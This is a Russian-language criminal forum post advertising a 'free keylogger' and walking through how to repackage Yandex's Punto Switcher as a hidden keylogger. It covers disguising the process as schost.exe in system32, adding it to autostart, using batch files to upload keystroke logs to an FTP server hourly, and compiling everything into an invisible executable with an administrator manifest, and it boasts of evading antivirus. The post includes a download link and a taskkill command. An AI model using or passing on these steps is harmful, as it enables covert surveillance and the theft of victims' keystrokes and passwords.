Скрыть объявление
Для безопасных сделок с продавцами рекомендуем пользоваться Гарант сервисом

Халявный Keylogger

Тема в разделе "Программы", создана пользователем Marlb0r0, 30/5/15.

  1. Marlb0r0

    Marlb0r0 dark-service.xyz
    VIP Внесен депозит 200$

    Сообщения:
    2.838
    Симпатии:
    541
    [​IMG]

    Данный кейлогер - это измененный Punto Switcher от Яндекса. Главная его особенность это абсолютно чистый код, непалющийся ни одним антивирусом!
    Нам понадобится : bat to exe
    качаем архивчик,открываем и видим
    1.schost.exe.Кликаем по нему 2 раза(с 1ого клика он запуститься скрытно) и снимаем все галочки во всех вкладках: "общие","горячие клавиши","устранение проблем","звуки".В "Дневник" чекаем все галочки кроме автоматического сохранения буфера обмена.Можно поставить пароль,в случае если кто-то перехватит наш дневник.Кликаем принять>ок
    [​IMG]
    [​IMG]
    [​IMG]

    2.Открываем Run.bat(см скриншот).У меня кейлогер хранится по адресу :
    C:\Windows\system32\Keylogger, вы уже сами думайте куда будете бомбить.Главное не забудьте в Run.bat и других батниках изменить пути на свои.
    [​IMG]

    3.Заходим в папку ftp , открываем SendFile.bat(см скриншот) - это собственно файлик с помощью которого мы будем лить логи на ftp
    [​IMG]

    4.Открываем RunSendFile.bat(см скриншот).Суть этого батника в том,что он будет через 60 мин(3600000мсек) перезапускать SendFile.bat,который и будет заливать логи на ftp.Также в Run.bat мы добавили RunSendFile в автозагрузку.
    [​IMG]

    5.Теперь RunSendFile.bat и SendFile.bat конвертируем в exe с помощью bat to exe.(см скриншот).В том и том батнике выставляем одинаково галочки.

    [​IMG]


    6.А теперь конвертируем Run.bat в exe и внимание перед конвертированием убиваем процесс schost.exe в ДС
    1)Чекаем invisible apllication,delete at exit,temporary directory и Add vista administrator manifest
    2)В Include жмем add и добавляем все файлы кроме Run.bat.По очереди.т.е сначала userdata.local schost.exe pshook.dll diary.exe diary.dll.Потом открываем папки и добавляем файлы из папок.В virusinformation можно поставить иконку.
    3.Нажимаем Comple
    [​IMG]
    [​IMG]

    Все smile-10
    файлик dairy.dat залитый на ваш ftp вы скачиваете и кидаете в User Data,потом кликаем dairy.exe и смотрим логи
    [​IMG]


    особенности:
    поскольку кейлогер от Яндекс,то он после 2 перезагрузок копмьютера изменяет настройки,появляется в трее,и добавляет Punto Sweacher в автозагрузку еще раз,поэтому в RunSendFile.bat первая команда- это taskkill /f /im schost.exe > nul

    Скачать​
     
    #1 Marlb0r0, 30/5/15
(Вы должны войти или зарегистрироваться, чтобы разместить сообщение.)

Поделиться этой страницей